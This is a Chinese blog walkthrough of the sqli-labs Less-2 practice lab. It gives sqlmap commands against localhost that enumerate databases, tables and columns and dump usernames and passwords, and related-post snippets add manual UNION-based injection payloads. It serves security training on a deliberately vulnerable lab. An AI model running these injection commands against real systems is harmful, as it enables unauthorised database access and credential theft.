使用sqlmap对sqli-less-2 的题解

最新推荐文章于 2024-03-20 23:52:24 发布
最新推荐文章于 2024-03-20 23:52:24 发布
阅读量387 收藏 1
点赞数 1
文章标签: mysql 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44352058/article/details/105891309
版权

1.检测注入点

sqlmap.py -u http://localhost/sqli/Less-2/?id=1

在这里插入图片描述
在这里插入图片描述
2.查看数据库

sqlmap.py -u http://localhost/sqli/Less-2/?id=1 –dbs

在这里插入图片描述
3.查看数据库中的表

sqlmap.py -u http://localhost/sqli/Less-2/?id=1 -D security –tables

在这里插入图片描述
4.查看security中的列

sqlmap.py -u http://localhost/sqli/Less-2/?id=1 -D security -T users
–columns

在这里插入图片描述
5.查看列中的字段值

sqlmap.py -u http://localhost/sqli/Less-2/?id=1 -D security -T users
-C username,password –dump
在这里插入图片描述

Ap°
关注
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
SQL注入实例(sqli-labs/less-2
最新发布
Thewei666的博客
08-03 308
当没有闭合符号进行注释时,网页并没有报错,所以可以确定无闭合符号,为数值型注入。
Sqli-labs less 2
weixin_34175509的博客
08-11 150
Less-2 将'(单引号)添加到数字中。 我们又得到了一个Mysql返回的错误,提示我们语法错误。 YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear''LIMIT...
sqli less-02
ANYOUZHEN的博客
04-30 433
输入id=1,回显正常,输入id=1',回显异常,接着输入id=1'--+ 输入id=1'--+仍然报错 其是整型(id=$id limit 0,1),然后不加单引号 猜测成功,我们用常规sql思路走走 ?id=1 order by 3--+ 我们发现表格只有3列 我们使用联合查询进行查找,由于整数型,我们删去’ 输入?id=-1 union select 1,2,3--+ 接着查询数据库?id=-1 union select 1,2,database()--+ ...
sql-libs——less2
bronze_s的博客
10-11 1476
带入执行的SQL语句 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 判断列数 http://192.168.0.5:9002/Less-2/?id=1 order by 3 http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,3 爆表名 http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(table_na
sqlmapsqllibs_02-post型-11-16
Xor0ne
07-28 540
11、less11-Error Based- String bp抓包,然后右键将我抓到的包保存为txt格式。 11.1、枚举–信息获取 在上一篇文章中我们讨论的主要是跑数据库的一般步骤,接下来,我们具体讨论一下通过枚举参数我们可以获取到的信息。 在这里我们使用的参数是 - r,即从一个文件中载入http请求。 首先,我们先把枚举参数列出来,然后再逐一复现吧。 Enumeration(枚举): 这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的 SQL 语句。 -
sqli-labs题解
F1rstb100d
10-22 1234
sqli-labs题解
SQL注入实操】sql-lib的1-8道题
m0_73629042的博客
03-20 1320
这里发现一个很有意思的东西,当我输入中文的单引号,再加上#时,回显正常(这里有点疑惑,不会识别中文字符,而且#注释的是后面的语句。1’是我们输入的内容,目的是为了闭合前面的‘号,后面剩下'),其中)的出现肯定是因为先前的语句中有(,所以我们需要将它闭合,然后直接将后面的')注释。id=1'#,回显正常即可,但是这里#貌似不起作用,可能是数据库对#和--要求不同,我们也可以先将后面的'闭合,再闭合前面的( 还是需要注释后面的,事实上不注释也可以)数字不报错,单引号报错,双引号不报错,所以是单引号注入漏洞。
备战CTF做题题解
weixin_40707492的博客
07-21 6939
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
sqlib练习
NoOneGroup
01-08 814
sqlib 新博客链接 环境搭建 本来想用阿里云搭建的,然后续费了一年,发觉阿里的那个防御有点烦,注入下被检测到就ban ip,搞得我都没法测试,最后就用docker搭建了 docker pull acgpiano/sqli-labs docker run -dt --name sqli-labs -p 4005:80 --rm acgpiano/sqli-labs sqli-labs1 拿到...
使用sqlmapsqli-less-12题解
weixin_44352058的博客
05-03 828
1.由于该题是post注入,所以我们在用户名密码处随意输入并使用bp进行抓包存储文件。 2.查询注入点 sqlmap.py -r 1.txt 3.查询数据库 sqlmap.py -r 1.txt –dbs 4.查询表 sqlmap.py -r 1.txt -D security –tables 5.查询列 sqlmap.py -r 1.txt -D security -T u...
Sqli-labs之Less-2
m0_46315342的博客
06-04 541
                                    Less-2   =...
sql-libs less2 详解答案
小白巨白的博客
01-17 627
首先,判断是哪一种的注入类型——整数型错误 127.0.0.1/Less-2/?id=2 当进行注入的时候,由于在添加单引号的时候整体会发生变化,后部分采用注释将其含义进行消除可以发现对应的sql语句应该是 select * from user where id= 参数 所以可以在其后面进行添加和索引 通过group by 1,2,3的参数可以大致知道对应所有的列数,当自动添加到4时产生错误,所以我们应将 数目得到确定为3 当出现错误时,判断哪个错误地方可以进行注入 127.0.0.1/Less-2/?id
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1509
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
sqli-labs 通关教程 Less-2
一期一会的博客
12-03 943
区分类型(数字型) http://127.0.0.1/sqlilabs/Less-2/?id=1 and 1=1 http://127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 查找回显点 使用二分法,确定回显点,首先试6,没反应,试3,有反应;试5,无反应,试4,无反应。可以确定回显点为3 http://127.0.0.1/sqlilabs/Less-2/?id=1 order by 3 查看存放位置 http://127.0.0.1/.
SQLi Labs Less-1 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
SQLi第一关,sqllabs less-1,sqli-labs less1
sqli-labs初学(一):联合查询注入less-1&less-2
ajsdsapasom的博客
04-22 593
此篇为我个人练习,仅供大家参考,若有错误请及时指出! Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程。博客地址为: http://dummy2dummies.blogspot.hk/,博客当中有一些示例,国内很多博客内容都是从该作者的博客翻译过来的。同时该作者也发了一套相关的视频,在youtube上可以查看。ps:印度人讲英语口音太重了。。。。凑合着听懂点。 此处考虑到有些朋友不会翻墙,遂分享到国内地址。 http://pan.baidu.com/s/1bo2L1JT
SqliLess-1和less-2操作步骤 ,求出username和password下的字段内容
m0_52341820的博客
04-13 469
Less-1: 进入Less-1页面: 检查页面是否存在sql注入,输入敏感字符%27,出现报错,说明存在注入漏洞。 判断查询表的列数:使用order by语句和二分法探测出列数为三 之后判断显示位:使用union select联合查询语句判断显示位,若希望显示出后面的,需要将union语句的前半部分显示为假 之后求当前数据库的名字,得出数据库名等于secuirty 之后查询数据的下的表名:http://127.0.0.1/sqli/Less-1/?id=-1' %20%20 un.
sqli-labs less2-7
sopora的博客
10-09 362
  LESS 2 基于整形数的注入 用id=’测试,发现报错,根据报错信息发现第二关的参数是整形,直接构造payload: http://localhost/sqli-labs-master/Less-2/?id=0 union select 1,group_concat(username),group_concat(password) from users%23 LESS 3 带括号...
sqlmapsqli-labs21
11-08
根据提供的引用内容,可以得知sqlmap是一款自动化的SQL注入工具,可以用于检测和利用SQL注入漏洞。而sqli-labs是一个用于学习SQL注入的实验平台,其中包含了多个不同难度级别的SQL注入漏洞。因此,sqlmap可以用于对sqli-labs中的SQL注入漏洞进行检测和利用。 引用中的命令是用于获取security数据库中users表中的password和username字段的数据,其中-u参数指定了目标URL,--level和--risk参数指定了检测的深度和风险等级,-D参数指定了要操作的数据库-T参数指定了要操作的表,-C参数指定了要获取的字段,--dump参数表示将获取到的数据输出到控制台。 引用中的命令是用于获取security数据库中users表的字段信息,其中-u、--level、--risk和-D参数的含义与引用相同,-T参数指定了要操作的表,--columns参数表示获取表的字段信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值